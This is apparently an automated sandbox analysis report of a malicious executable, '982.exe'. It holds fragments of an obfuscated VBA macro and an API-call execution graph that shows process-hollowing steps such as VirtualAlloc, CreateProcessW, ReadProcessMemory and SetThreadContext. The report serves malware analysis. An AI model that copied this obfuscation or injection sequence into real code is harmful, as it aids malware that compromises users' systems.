                HRs8wo = HG0RQi - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(zqDQZ7) - 6977 - YjRQrq - Hz5p3D * Sin(mjjrHIf)

                HG0RQi

                ChrW

                Oct

                CDate

                Fix

                zqDQZ7

                YjRQrq

                Hz5p3D

                Sin

                mjjrHIf

                62

                Next

                nP1obkp

                63

                Loop Until Xb5lam = diSWXniz

                Xb5lam

                diSWXniz

                64

                UMvDUH = Replace(jNQUnno, Replace("09NhI09NhuH09Nh309Nh", "09Nh", ""), "")

                Replace("09NhI09NhuH09Nh309Nh","09Nh","") -> IuH3

                executed
                65

                On Error Resume Next

                66

                Set mna = xqmm6672

                xqmm6672

                67

                Do

                qaB0m7mo

                E9cRqzhV

                68

                If wMBYtY = O_vT8j Then

                wMBYtY

                O_vT8j

                69

                mEczi1 = Tan(1141)

                Tan

                70

                Endif

                71

                ViXQd2j8 = EqHGmqzs * CDate(p2VQvUjT) / nJES0LA / WiwqHbr + (XzCzPS7 / CStr(FfJUME) / 3 * CStr(wlzHbq))

                EqHGmqzs

                CDate

                p2VQvUjT

                nJES0LA

                WiwqHbr

                XzCzPS7

                CStr

                FfJUME

                wlzHbq

                72

                For Each HV_KNz in t3Fh05z

                t3Fh05z

                73

                w5XZFSu = aGJjAH - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(F97Z_Sb) - 6977 - Q0hGCzd - ojvDCQi * Sin(wNX30a)

                aGJjAH

                ChrW

                Oct

                CDate

                Fix

                F97Z_Sb

                Q0hGCzd

                ojvDCQi

                Sin

                wNX30a

                74

                Next

                t3Fh05z

                75

                Loop Until qaB0m7mo = E9cRqzhV

                qaB0m7mo

                E9cRqzhV

                76

                End Function

                Reset < >

                  Analysis Process: 982.exe PID: 3644 Parent PID: 3456 982.exeUNIQUE

                  Execution Graph

                  Execution Coverage:5.1%
                  Dynamic/Decrypted Code Coverage:16.2%
                  Signature Coverage:3.8%
                  Total number of Nodes:655
                  Total number of Limit Nodes:27

                  Graph

                  execution_graph 29618 439cc3 29621 42914d 29618->29621 29624 429111 29621->29624 29623 42915a 29625 42911d __locking 29624->29625 29632 42af11 29625->29632 29631 42913e __locking 29631->29623 29658 42eace 29632->29658 29634 429122 29635 429026 29634->29635 29667 42c10e TlsGetValue 29635->29667 29638 42c10e __decode_pointer 7 API calls 29639 42904a 29638->29639 29649 4290cd 29639->29649 29679 42b47a 29639->29679 29641 429068 29644 429092 29641->29644 29645 429083 29641->29645 29654 4290b4 29641->29654 29648 42908c 29644->29648 29644->29649 29704 43141c 75 API calls _realloc 29645->29704 29646 42c093 __encode_pointer 7 API calls 29646->29649 29648->29644 29652 4290a8 29648->29652 29705 43141c 75 API calls _realloc 29648->29705 29655 429147 29649->29655 29651 4290a2 29651->29649 29651->29652 29653 42c093 __encode_pointer 7 API calls 29652->29653 29653->29654 29692 42c093 TlsGetValue 29654->29692 29711 42af1a 29655->29711 29659 42eae3 29658->29659 29660 42eaf6 EnterCriticalSection 29658->29660 29665 42ea0b 69 API calls 9 library calls 29659->29665 29660->29634 29662 42eae9 29662->29660 29666 42aea5 69 API calls 3 library calls 29662->29666 29664 42eaf5 29664->29660 29665->29662 29666->29664 29668 42c126 29667->29668 29669 42c147 GetModuleHandleW 29667->29669 29668->29669 29672 42c130 TlsGetValue 29668->29672 29670 42c162 GetProcAddress 29669->29670 29671 42c157 29669->29671 29674 42c13f 29670->29674 29706 42ae75 Sleep GetModuleHandleW 29671->29706 29678 42c13b 29672->29678 29676 42c172 RtlDecodePointer 29674->29676 29677 42903a 29674->29677 29675 42c15d 29675->29670 29675->29677 29676->29677 29677->29638 29678->29669 29678->29674 29680 42b486 __locking 29679->29680 29681 42b4b3 29680->29681 29682 42b496 29680->29682 29684 42b4f4 HeapSize 29681->29684 29686 42eace __lock 69 API calls 29681->29686 29707 429429 69 API calls __getptd_noexit 29682->29707 29688 42b4ab __locking 29684->29688 29685 42b49b 29708 42e4db 7 API calls 2 library calls 29685->29708 29689 42b4c3 ___sbh_find_block 29686->29689 29688->29641 29709 42b514 LeaveCriticalSection _doexit 29689->29709 29691 42b4ef 29691->29684 29691->29688 29693 42c0ab 29692->29693 29694 42c0cc GetModuleHandleW 29692->29694 29693->29694 29695 42c0b5 TlsGetValue 29693->29695 29696 42c0e7 GetProcAddress 29694->29696 29697 42c0dc 29694->29697 29701 42c0c0 29695->29701 29703 42c0c4 29696->29703 29710 42ae75 Sleep GetModuleHandleW 29697->29710 29699 42c0f7 RtlEncodePointer 29700 4290c2 29699->29700 29700->29646 29701->29694 29701->29703 29702 42c0e2 29702->29696 29702->29700 29703->29699 29703->29700 29704->29648 29705->29651 29706->29675 29707->29685 29709->29691 29710->29702 29714 42e9f4 LeaveCriticalSection 29711->29714 29713 42914c 29713->29631 29714->29713 29715 439d42 29720 438215 29715->29720 29718 42914d _Error_objects 76 API calls 29719 439d58 29718->29719 29723 42083d 29720->29723 29728 41f599 29723->29728 29725 42084c 29726 42086f 29725->29726 29739 41f075 29725->29739 29726->29718 29729 41f5a5 __EH_prolog3 29728->29729 29731 41f5f3 29729->29731 29747 41f2af TlsAlloc 29729->29747 29751 41f197 EnterCriticalSection 29729->29751 29773 413dd0 RaiseException __CxxThrowException@8 29729->29773 29766 41f009 EnterCriticalSection 29731->29766 29736 41f606 29774 41f356 80 API calls 5 library calls 29736->29774 29737 41f619 std::runtime_error::runtime_error 29737->29725 29740 41f081 __EH_prolog3_catch 29739->29740 29741 41f0aa std::runtime_error::runtime_error 29740->29741 29782 420c0d 29740->29782 29741->29725 29743 41f090 29744 41f09d 29743->29744 29792 4207f8 29743->29792 29795 420c7f LeaveCriticalSection RaiseException ctype 29744->29795 29748 41f2e0 InitializeCriticalSection 29747->29748 29749 41f2db 29747->29749 29748->29729 29775 413d98 RaiseException __CxxThrowException@8 29749->29775 29755 41f1ba 29751->29755 29752 41f290 LeaveCriticalSection 29752->29729 29753 41f1f3 29776 41547b 29753->29776 29754 41f208 GlobalHandle GlobalUnlock 29757 41547b ctype 72 API calls 29754->29757 29755->29753 29755->29754 29765 41f279 _memset 29755->29765 29759 41f226 GlobalReAlloc 29757->29759 29760 41f232 29759->29760 29761 41f259 GlobalLock 29760->29761 29762 41f24b LeaveCriticalSection 29760->29762 29763 41f23d GlobalHandle GlobalLock 29760->29763 29761->29765 29780 413d98 RaiseException __CxxThrowException@8 29762->29780 29763->29762 29765->29752 29767 41f024 29766->29767 29768 41f04b LeaveCriticalSection 29766->29768 29767->29768 29769 41f029 TlsGetValue 29767->29769 29770 41f054 29768->29770 29769->29768 29771 41f035 29769->29771 29770->29736 29770->29737 29771->29768 29772 41f03a LeaveCriticalSection 29771->29772 29772->29770 29774->29737 29777 415490 ctype 29776->29777 29778 41549d GlobalAlloc 29777->29778 29781 404bc0 72 API calls _DebugHeapAllocator 29777->29781 29778->29760 29781->29778 29783 420c1d 29782->29783 29785 420c22 29782->29785 29796 413dd0 RaiseException __CxxThrowException@8 29783->29796 29784 420c30 29788 420c42 EnterCriticalSection 29784->29788 29789 420c6c EnterCriticalSection 29784->29789 29785->29784 29797 420ba4 InitializeCriticalSection 29785->29797 29790 420c61 LeaveCriticalSection 29788->29790 29791 420c4e InitializeCriticalSection 29788->29791 29789->29743 29790->29789 29791->29790 29798 4206bd 29792->29798 29794 420804 29794->29744 29795->29741 29797->29784 29799 4206c9 __EH_prolog3_catch 29798->29799 29818 404820 29799->29818 29805 420763 29827 41efd6 LocalAlloc RaiseException _DebugHeapAllocator 29805->29827 29807 420772 29808 420784 29807->29808 29828 4203af 106 API calls 3 library calls 29807->29828 29829 41efd6 LocalAlloc RaiseException _DebugHeapAllocator 29808->29829 29811 420797 29812 4207a9 29811->29812 29830 4205f3 106 API calls 3 library calls 29811->29830 29831 41efd6 LocalAlloc RaiseException _DebugHeapAllocator 29812->29831 29815 4207bd 29817 4207cf std::runtime_error::runtime_error 29815->29817 29832 420676 106 API calls 3 library calls 29815->29832 29817->29794 29819 40482c ctype 29818->29819 29833 405540 29819->29833 29821 404835 29822 405860 29821->29822 29823 405871 _DebugHeapAllocator 29822->29823 29824 4058a2 29823->29824 29838 405dc0 29823->29838 29826 40b71f 69 API calls _malloc 29824->29826 29826->29805 29827->29807 29828->29808 29829->29811 29830->29812 29831->29815 29832->29817 29834 405549 29833->29834 29836 405569 _DebugHeapAllocator 29834->29836 29837 404bc0 72 API calls _DebugHeapAllocator 29834->29837 29836->29821 29837->29834 29839 405dd1 _DebugHeapAllocator 29838->29839 29840 405e05 29839->29840 29841 405df7 29839->29841 29843 405e03 29840->29843 29853 4060d0 72 API calls _DebugHeapAllocator 29840->29853 29845 406010 29841->29845 29843->29824 29846 406021 _DebugHeapAllocator 29845->29846 29854 4153f5 29846->29854 29849 406061 _DebugHeapAllocator 29859 405fa0 69 API calls _memcpy_s 29849->29859 29851 40609f _DebugHeapAllocator ctype 29851->29843 29853->29843 29855 406053 29854->29855 29856 415409 29854->29856 29855->29849 29858 406000 72 API calls _DebugHeapAllocator 29855->29858 29860 4282cd 29856->29860 29858->29849 29859->29851 29861 428380 29860->29861 29868 4282df 29860->29868 29862 42f5d4 _realloc 7 API calls 29861->29862 29864 428386 29862->29864 29863 4282f0 29865 42b8da __FF_MSGBANNER 68 API calls 29863->29865 29863->29868 29869 42b72f __NMSG_WRITE 68 API calls 29863->29869 29872 42aef9 __mtinitlocknum GetModuleHandleW GetProcAddress ExitProcess 29863->29872 29866 429429 __vscwprintf_helper 68 API calls 29864->29866 29865->29863 29867 428378 29866->29867 29867->29855 29868->29863 29868->29867 29870 42827e _malloc 68 API calls 29868->29870 29871 42833c RtlAllocateHeap 29868->29871 29873 42836c 29868->29873 29874 42f5d4 _realloc 7 API calls 29868->29874 29876 428371 29868->29876 29869->29863 29870->29868 29871->29868 29872->29863 29875 429429 __vscwprintf_helper 68 API calls 29873->29875 29874->29868 29875->29876 29877 429429 __vscwprintf_helper 68 API calls 29876->29877 29877->29867 29881 4290e0 29886 4313d0 29881->29886 29884 42c093 __encode_pointer 7 API calls 29885 4290f4 29884->29885 29888 4313d9 29886->29888 29889 4290ec 29888->29889 29890 4313f7 Sleep 29888->29890 29892 4303c5 29888->29892 29889->29884 29891 43140c 29890->29891 29891->29888 29891->29889 29893 4303d1 __locking 29892->29893 29894 430408 _memset 29893->29894 29895 4303e9 29893->29895 29899 43047a RtlAllocateHeap 29894->29899 29900 42eace __lock 68 API calls 29894->29900 29901 4303fe __locking 29894->29901 29907 42f2e0 5 API calls 2 library calls 29894->29907 29908 4304c1 LeaveCriticalSection _doexit 29894->29908 29909 42f5d4 7 API calls __decode_pointer 29894->29909 29905 429429 69 API calls __getptd_noexit 29895->29905 29897 4303ee 29906 42e4db 7 API calls 2 library calls 29897->29906 29899->29894 29900->29894 29901->29888 29905->29897 29907->29894 29908->29894 29909->29894 29910 42b721 SetUnhandledExceptionFilter 29911 439a69 29916 411963 29911->29916 29914 42914d _Error_objects 76 API calls 29915 439acf 29914->29915 29917 42083d ctype 106 API calls 29916->29917 29918 41196d 29917->29918 29918->29914 29924 2c0000 29926 2c0005 29924->29926 29929 2c002d 29926->29929 29949 2c0467 GetPEB 29929->29949 29932 2c0467 GetPEB 29933 2c0053 29932->29933 29934 2c0467 GetPEB 29933->29934 29935 2c0061 29934->29935 29936 2c0467 GetPEB 29935->29936 29937 2c006d 29936->29937 29938 2c0467 GetPEB 29937->29938 29939 2c007b 29938->29939 29940 2c0467 GetPEB 29939->29940 29943 2c0089 29940->29943 29941 2c00e6 GetNativeSystemInfo 29942 2c0109 VirtualAlloc 29941->29942 29947 2c0029 29941->29947 29946 2c0135 29942->29946 29943->29941 29943->29947 29944 2c03c3 29951 521900 29944->29951 29945 2c0384 VirtualProtect 29945->29946 29945->29947 29946->29944 29946->29945 29950 2c0045 29949->29950 29950->29932 29952 521932 29951->29952 29957 521000 29952->29957 29954 52193e 29960 521470 29954->29960 29956 52196c ExitProcess 29956->29947 29976 522800 GetPEB 29957->29976 29959 5213c5 29959->29954 29961 521486 29960->29961 29962 521569 CreateProcessW 29961->29962 29963 521578 29961->29963 29964 52159e ReadProcessMemory 29961->29964 29966 52153d 29961->29966 29967 5220a0 10 API calls 29961->29967 29969 522290 10 API calls 29961->29969 29971 521820 SetThreadContext 29961->29971 29973 521858 CloseHandle 29961->29973 29974 521865 CloseHandle 29961->29974 29975 521872 CloseHandle 29961->29975 29978 522150 29961->29978 29989 521ca0 29961->29989 30000 521fd0 29961->30000 29962->29961 29962->29963 29963->29966 30011 5220a0 29963->30011 29964->29961 29964->29963 29967->29961 29969->29961 29971->29961 29971->29963 29973->29961 29974->29961 29975->29961 29977 52282a 29976->29977 29977->29959 29979 522171 29978->29979 29980 521000 GetPEB 29979->29980 29981 52217d 29980->29981 30022 522ad0 29981->30022 29983 522193 29984 52225b 29983->29984 29985 52219b 29983->29985 29987 5226b0 9 API calls 29984->29987 29986 521980 9 API calls 29985->29986 29988 522242 29986->29988 29987->29988 29988->29961 29990 521cc1 29989->29990 29991 521000 GetPEB 29990->29991 29992 521ccd 29991->29992 29993 522ad0 IsWow64Process 29992->29993 29994 521ce3 29993->29994 29995 521d81 29994->29995 29996 521ceb 29994->29996 30025 522630 29995->30025 30028 521980 29996->30028 29999 521d68 29999->29961 30001 521ff1 30000->30001 30002 521000 GetPEB 30001->30002 30003 521ffd 30002->30003 30004 522ad0 IsWow64Process 30003->30004 30005 522013 30004->30005 30006 522063 30005->30006 30007 522017 30005->30007 30043 522670 30006->30043 30008 521980 9 API calls 30007->30008 30010 522058 30008->30010 30010->29961 30012 5220b8 30011->30012 30013 521000 GetPEB 30012->30013 30014 5220c4 30013->30014 30015 522ad0 IsWow64Process 30014->30015 30016 5220da 30015->30016 30017 52212a 30016->30017 30018 5220de 30016->30018 30046 522690 30017->30046 30019 521980 9 API calls 30018->30019 30021 52211f 30019->30021 30021->29966 30023 522adc IsWow64Process 30022->30023 30024 522ae9 30022->30024 30023->30024 30026 521980 9 API calls 30025->30026 30027 52263a 30026->30027 30027->29999 30029 521000 GetPEB 30028->30029 30032 521a1f 30029->30032 30031 521a50 CreateFileW 30031->30032 30038 521a60 30031->30038 30033 521a7f VirtualAlloc 30032->30033 30032->30038 30039 521b89 CloseHandle 30032->30039 30040 521b99 VirtualFree 30032->30040 30041 522860 GetPEB 30032->30041 30034 521aa0 ReadFile 30033->30034 30033->30038 30037 521ac1 VirtualAlloc 30034->30037 30034->30038 30035 521c7e VirtualFree 30036 521c8f 30035->30036 30036->29999 30037->30032 30037->30038 30038->30035 30038->30036 30039->30032 30040->30032 30042 52288a 30041->30042 30042->30031 30044 521980 9 API calls 30043->30044 30045 52267a 30044->30045 30045->30010 30047 521980 9 API calls 30046->30047 30048 52269a 30047->30048 30048->30021 30049 439ccf 30054 4215c7 30049->30054 30051 439cd9 30052 42914d _Error_objects 76 API calls 30051->30052 30053 439ce3 30052->30053 30059 42156b 8 API calls 30054->30059 30056 4215d3 30060 421525 7 API calls 30056->30060 30058 4215df LoadCursorW LoadCursorW 30058->30051 30059->30056 30060->30058 30061 427a0f 30065 42c660 30061->30065 30063 427a14 30064 42c660 5 API calls 30063->30064 30064->30063 30066 42c692 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount RtlQueryPerformanceCounter 30065->30066 30067 42c685 30065->30067 30068 42c689 30066->30068 30067->30066 30067->30068 30068->30063 30072 439a4c 30073 42914d _Error_objects 76 API calls 30072->30073 30074 439a56 30073->30074 30075 439d2c 30080 437cae 30075->30080 30078 42914d _Error_objects 76 API calls 30079 439d40 30078->30079 30081 437cb8 30080->30081 30084 437c2f 30081->30084 30083 437cdf 30083->30078 30088 429338 30084->30088 30086 437c3b InitializeCriticalSection 30087 437c6a __locking 30086->30087 30087->30083 30088->30086 30093 427892 30130 429338 30093->30130 30095 42789e GetStartupInfoW 30097 4278c1 30095->30097 30131 42c630 HeapCreate 30097->30131 30101 427911 30133 42c4a3 GetModuleHandleW 30101->30133 30103 427922 __RTC_Initialize 30167 42bdf3 30103->30167 30106 427930 30107 42793c GetCommandLineW 30106->30107 30230 42aea5 69 API calls 3 library calls 30106->30230 30182 42bd96 GetEnvironmentStringsW 30107->30182 30110 42793b 30110->30107 30111 42794b 30189 42bce8 GetModuleFileNameW 30111->30189 30114 427960 30195 42bab9 30114->30195 30118 427971 30208 42af64 30118->30208 30121 427978 30123 427983 __wwincmdln 30121->30123 30233 42aea5 69 API calls 3 library calls 30121->30233 30216 43820a 30123->30216 30126 4279b2 30235 42b141 116 API calls _doexit 30126->30235 30129 4279b7 __locking 30130->30095 30132 427905 30131->30132 30132->30101 30228 427869 69 API calls 3 library calls 30132->30228 30134 42c4b7 30133->30134 30135 42c4be 30133->30135 30247 42ae75 Sleep GetModuleHandleW 30134->30247 30137 42c626 30135->30137 30138 42c4c8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 30135->30138 30249 42c1bd 72 API calls 2 library calls 30137->30249 30141 42c511 TlsAlloc 30138->30141 30140 42c4bd 30140->30135 30143 427917 30141->30143 30144 42c55f TlsSetValue 30141->30144 30143->30103 30229 427869 69 API calls 3 library calls 30143->30229 30144->30143 30145 42c570 30144->30145 30236 42b15f 30145->30236 30148 42c093 __encode_pointer 7 API calls 30149 42c580 30148->30149 30150 42c093 __encode_pointer 7 API calls 30149->30150 30151 42c590 30150->30151 30152 42c093 __encode_pointer 7 API calls 30151->30152 30153 42c5a0 30152->30153 30154 42c093 __encode_pointer 7 API calls 30153->30154 30155 42c5b0 30154->30155 30243 42e952 30155->30243 30158 42c10e __decode_pointer 7 API calls 30159 42c5d1 30158->30159 30159->30137 30160 4313d0 __calloc_crt 69 API calls 30159->30160 30161 42c5ea 30160->30161 30161->30137 30162 42c10e __decode_pointer 7 API calls 30161->30162 30163 42c604 30162->30163 30163->30137 30164 42c60b 30163->30164 30248 42c1fa 69 API calls 5 library calls 30164->30248 30166 42c613 GetCurrentThreadId 30166->30143 30261 429338 30167->30261 30169 42bdff GetStartupInfoA 30170 4313d0 __calloc_crt 69 API calls 30169->30170 30172 42be20 30170->30172 30171 42c03e __locking 30171->30106 30172->30171 30174 4313d0 __calloc_crt 69 API calls 30172->30174 30176 42bf85 30172->30176 30181 42bf08 30172->30181 30173 42bfbb GetStdHandle 30173->30176 30174->30172 30175 42c020 SetHandleCount 30175->30171 30176->30171 30176->30173 30176->30175 30177 42bfcd GetFileType 30176->30177 30178 43236f __ioinit InitializeCriticalSectionAndSpinCount 30176->30178 30177->30176 30178->30176 30179 42bf31 GetFileType 30179->30181 30180 43236f __ioinit InitializeCriticalSectionAndSpinCount 30180->30181 30181->30171 30181->30176 30181->30179 30181->30180 30183 42bda7 30182->30183 30184 42bdab 30182->30184 30183->30111 30184->30184 30185 42bdbe 30184->30185 30262 43138b 69 API calls _malloc 30185->30262 30187 42bdcc _memcpy_s 30188 42bdd3 FreeEnvironmentStringsW 30187->30188 30188->30111 30190 42bd1d _wparse_cmdline 30189->30190 30191 427955 30190->30191 30192 42bd5a 30190->30192 30191->30114 30231 42aea5 69 API calls 3 library calls 30191->30231 30263 43138b 69 API calls _malloc 30192->30263 30194 42bd60 _wparse_cmdline 30194->30191 30196 42bad1 _wcslen 30195->30196 30200 427966 30195->30200 30197 4313d0 __calloc_crt 69 API calls 30196->30197 30203 42baf5 _wcslen 30197->30203 30198 42bb5a 30266 428397 69 API calls 7 library calls 30198->30266 30200->30118 30232 42aea5 69 API calls 3 library calls 30200->30232 30201 4313d0 __calloc_crt 69 API calls 30201->30203 30202 42bb80 30267 428397 69 API calls 7 library calls 30202->30267 30203->30198 30203->30200 30203->30201 30203->30202 30206 42bb3f 30203->30206 30264 42abeb 69 API calls __vscwprintf_helper 30203->30264 30206->30203 30265 42e3b3 10 API calls 3 library calls 30206->30265 30210 42af72 __IsNonwritableInCurrentImage 30208->30210 30268 43208c 30210->30268 30211 42af90 __initterm_e 30212 42914d _Error_objects 76 API calls 30211->30212 30215 42afc0 __IsNonwritableInCurrentImage 30211->30215 30213 42afaf 30212->30213 30272 42af23 30213->30272 30215->30121 30217 43823f 30216->30217 30313 41d6ab 30217->30313 30220 42083d ctype 106 API calls 30221 438256 30220->30221 30316 4277e2 SetErrorMode SetErrorMode 30221->30316 30225 4279a4 30225->30126 30234 42b115 116 API calls _doexit 30225->30234 30226 438287 30373 4261ed 109 API calls ctype 30226->30373 30228->30101 30229->30103 30230->30110 30231->30114 30232->30118 30233->30123 30234->30126 30235->30129 30250 42c105 30236->30250 30238 42b167 __init_pointers __initp_misc_winsig 30253 42d433 30238->30253 30241 42c093 __encode_pointer 7 API calls 30242 42b1a3 30241->30242 30242->30148 30244 42e95d 30243->30244 30246 42c5bd 30244->30246 30256 43236f 30244->30256 30246->30137 30246->30158 30247->30140 30248->30166 30249->30143 30251 42c093 __encode_pointer 7 API calls 30250->30251 30252 42c10c 30251->30252 30252->30238 30254 42c093 __encode_pointer 7 API calls 30253->30254 30255 42b199 30254->30255 30255->30241 30260 429338 30256->30260 30258 43237b InitializeCriticalSectionAndSpinCount 30259 4323bf __locking 30258->30259 30259->30244 30260->30258 30261->30169 30262->30187 30263->30194 30264->30203 30265->30206 30266->30200 30267->30200 30270 432092 30268->30270 30269 42c093 __encode_pointer 7 API calls 30269->30270 30270->30269 30271 4320aa 30270->30271 30271->30211 30273 42af2d 30272->30273 30274 42af3d 30273->30274 30276 439a30 30273->30276 30274->30215 30281 408470 30276->30281 30279 42914d _Error_objects 76 API calls 30280 439a47 30279->30280 30280->30273 30284 41d3dc 30281->30284 30283 408481 30283->30279 30285 41d3e8 __EH_prolog3 30284->30285 30296 41da26 30285->30296 30287 41d3f2 30288 41d40a 30287->30288 30305 42b22a 69 API calls 4 library calls 30287->30305 30290 42083d ctype 106 API calls 30288->30290 30291 41d418 30290->30291 30294 41d42f GetCurrentThread GetCurrentThreadId 30291->30294 30302 417474 30291->30302 30306 413dd0 RaiseException __CxxThrowException@8 30291->30306 30295 41d4b0 std::runtime_error::runtime_error 30294->30295 30295->30283 30297 41da32 __EH_prolog3 30296->30297 30298 411963 _Error_objects 106 API calls 30297->30298 30299 41da3c 30298->30299 30307 41d704 30299->30307 30301 41da54 std::runtime_error::runtime_error 30301->30287 30303 41f599 ctype 96 API calls 30302->30303 30304 41747e 30303->30304 30304->30291 30305->30288 30310 420285 30307->30310 30311 41f599 ctype 96 API calls 30310->30311 30312 41d71d GetCursorPos 30311->30312 30312->30301 30374 420870 30313->30374 30317 42083d ctype 106 API calls 30316->30317 30318 4277ff 30317->30318 30379 41ffe4 30318->30379 30321 42083d ctype 106 API calls 30322 427814 30321->30322 30323 427831 30322->30323 30324 42781b 30322->30324 30326 42083d ctype 106 API calls 30323->30326 30393 42764d 110 API calls 4 library calls 30324->30393 30327 427836 30326->30327 30328 427842 GetModuleHandleW 30327->30328 30387 41dc8f 30327->30387 30330 427862 30328->30330 30331 427851 GetProcAddress 30328->30331 30330->30226 30332 4084f0 30330->30332 30331->30330 30410 4080a0 30332->30410 30335 4080a0 7 API calls 30336 408545 30335->30336 30337 4080a0 7 API calls 30336->30337 30338 40855a 30337->30338 30339 4080a0 7 API calls 30338->30339 30340 40856f 30339->30340 30341 4282cd _malloc 69 API calls 30340->30341 30342 4085b2 _memcpy_s 30341->30342 30419 408a20 30342->30419 30344 4085d9 std::runtime_error::runtime_error 30425 4081a0 30344->30425 30346 40860d 30431 4083f0 30346->30431 30350 4080a0 7 API calls 30354 40863a 30350->30354 30351 408739 30437 408810 69 API calls _Allocate 30351->30437 30353 408743 30355 408750 30353->30355 30360 408758 30353->30360 30356 4086a0 VirtualAlloc 30354->30356 30438 4065a0 108 API calls 30355->30438 30434 428b70 30356->30434 30439 411e2c ShowWindow 30360->30439 30362 4086ee _memcpy_s 30364 40871a 30362->30364 30436 41e32c 69 API calls 2 library calls 30362->30436 30363 4087c5 30440 408830 UpdateWindow 30363->30440 30364->30362 30366 4087cd 30441 408850 70 API calls 30366->30441 30368 4087d4 30442 408a60 69 API calls std::runtime_error::~runtime_error 30368->30442 30370 4087f0 30371 427dff __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30370->30371 30372 40880b 30371->30372 30372->30226 30373->30225 30375 42083d ctype 106 API calls 30374->30375 30376 420875 30375->30376 30377 417474 ctype 96 API calls 30376->30377 30378 41d6b0 30377->30378 30378->30220 30394 41fee8 30379->30394 30382 42002a 30383 420031 SetLastError 30382->30383 30386 42003e 30382->30386 30383->30386 30385 4200de 30385->30321 30400 427dff 30386->30400 30388 42083d ctype 106 API calls 30387->30388 30389 41dc94 30388->30389 30390 41dcbc 30389->30390 30391 420285 ctype 96 API calls 30389->30391 30390->30328 30392 41dca0 GetCurrentThreadId SetWindowsHookExW 30391->30392 30392->30390 30393->30323 30395 41fef1 GetModuleHandleW 30394->30395 30396 41ff55 GetModuleFileNameW 30394->30396 30397 41ff05 30395->30397 30398 41ff0a GetProcAddress GetProcAddress GetProcAddress GetProcAddress 30395->30398 30396->30382 30396->30386 30408 413dd0 RaiseException __CxxThrowException@8 30397->30408 30398->30396 30401 427e07 30400->30401 30402 427e09 IsDebuggerPresent 30400->30402 30401->30385 30409 43294b 30402->30409 30405 42d569 SetUnhandledExceptionFilter UnhandledExceptionFilter 30406 42d586 __invoke_watson 30405->30406 30407 42d58e GetCurrentProcess TerminateProcess 30405->30407 30406->30407 30407->30385 30409->30405 30443 407f90 30410->30443 30412 408145 30413 407f90 GetPEB 30412->30413 30414 408162 30413->30414 30415 40816b LoadLibraryExW 30414->30415 30416 408184 30415->30416 30417 427dff __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30416->30417 30418 408194 30417->30418 30418->30335 30420 408a31 std::_String_base::_Xlen Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 30419->30420 30447 408b30 30420->30447 30422 408a45 30451 408ac0 30422->30451 30426 4081b1 30425->30426 30430 4081aa _memset 30425->30430 30427 4080a0 7 API calls 30426->30427 30428 4081c0 30427->30428 30429 4282cd _malloc 69 API calls 30428->30429 30428->30430 30429->30430 30430->30346 30432 4080a0 7 API calls 30431->30432 30433 408405 30432->30433 30433->30350 30433->30362 30435 4086c7 VirtualAlloc 30434->30435 30435->30362 30436->30351 30437->30353 30438->30360 30439->30363 30440->30366 30441->30368 30442->30370 30446 407f70 GetPEB 30443->30446 30445 407f9b 30445->30412 30446->30445 30448 408b41 std::runtime_error::~runtime_error 30447->30448 30449 408b43 30447->30449 30448->30422 30449->30448 30455 409160 69 API calls 2 library calls 30449->30455 30452 408ad0 std::_String_base::_Xlen 30451->30452 30456 408bd0 30452->30456 30454 408a51 30454->30344 30455->30448 30457 408be3 std::_String_base::_Xlen 30456->30457 30458 408c0a 30457->30458 30459 408bea std::runtime_error::runtime_error 30457->30459 30466 408e10 70 API calls 3 library calls 30458->30466 30465 408c60 70 API calls 2 library calls 30459->30465 30462 408c08 std::runtime_error::~runtime_error 30462->30454 30463 408c18 std::runtime_error::runtime_error 30463->30462 30467 409160 69 API calls 2 library calls 30463->30467 30465->30462 30466->30463 30467->30462 30471 439ad1 30472 411963 _Error_objects 106 API calls 30471->30472 30473 439adb 30472->30473 30474 42914d _Error_objects 76 API calls 30473->30474 30475 439b3c 30474->30475 30482 41cc36 30483 41cc44 30482->30483 30486 41cb71 30483->30486 30487 41cba7 30486->30487 30489 41cc2e 30486->30489 30488 41cba8 RegOpenKeyExW 30487->30488 30487->30489 30490 41cbc5 RegQueryValueExW 30487->30490 30491 41cc17 RegCloseKey 30487->30491 30488->30487 30490->30487 30491->30487 30492 439cfb 30497 437b72 30492->30497 30494 439d05 30495 42914d _Error_objects 76 API calls 30494->30495 30496 439d0f 30495->30496 30501 429338 30497->30501 30499 437b7e InitializeCriticalSection 30500 437ba2 __locking 30499->30500 30500->30494 30501->30499 30502 439c39 30503 439c45 30502->30503 30504 42914d _Error_objects 76 API calls 30503->30504 30505 439c71 30504->30505

                  Executed Functions

                  Function 0042B721, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042B721() {

				SetUnhandledExceptionFilter(E0042B6DF); // executed
				return 0;
			}



                  0x0042b726
                  0x0042b72e

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002B6DF), ref: 0042B726
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: e34121512207d3df35726db4ee6287cc3aab959369eef7ca889ae8497b46d98f
                  • Instruction ID: 9e57d53febc17cb01723d5703a190261370daaf70e790823c484ba6701aab5cc
                  • Opcode Fuzzy Hash: e34121512207d3df35726db4ee6287cc3aab959369eef7ca889ae8497b46d98f
                  • Instruction Fuzzy Hash: 569002A03A11514B4A401B707C0E60527909B48712B9154616061D4155DB984450599B
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 005226D0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
